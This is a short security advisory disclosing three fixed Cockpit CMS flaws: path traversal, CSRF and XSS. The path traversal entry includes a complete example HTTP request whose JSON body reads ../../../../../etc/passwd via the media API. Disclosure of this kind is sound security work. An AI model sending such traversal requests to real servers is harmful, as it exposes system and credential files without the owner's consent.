Cockpit CMS CSRF / XSS / Path Traversal

2018-10-12T00:00:00
ID PACKETSTORM:149775
Type packetstorm
Reporter Simon Uvarov
Modified 2018-10-12T00:00:00

Description

                                        
                                            `#1 Path Traversal  
CVE-2018-15540  
It is possible to read/write/delete files or list directories by using "../" to traverse to other folders via requests to /cockpit/media/api  
  
Example of a vulnerable request:  
  
POST /cockpit/media/api HTTP/1.1  
Host: 192.168.5.129  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.5.129/cockpit/finder  
Content-Type: application/json; charset=UTF-8  
Content-Length: 53  
Cookie: 8071dec2be26139e39a170762581c00f=9me02iusm500432871pq0fjls2  
Connection: close  
  
{"cmd":"readfile","path":"../../../../../etc/passwd"}  
  
#2 Application Wide CSRF  
CVE-2018-15539  
The application lacks anti-csrf protection mechanism, thus, an attacker is able to change API tokens and passwords.  
  
#3 Application Wide XSS  
CVE-2018-15538  
The application is vulnerable to XSS attacks.  
  
The mentioned issues were targeted in the 0.6.2 release.  
  
Regards,  
Simon Uvarov  
  
  
`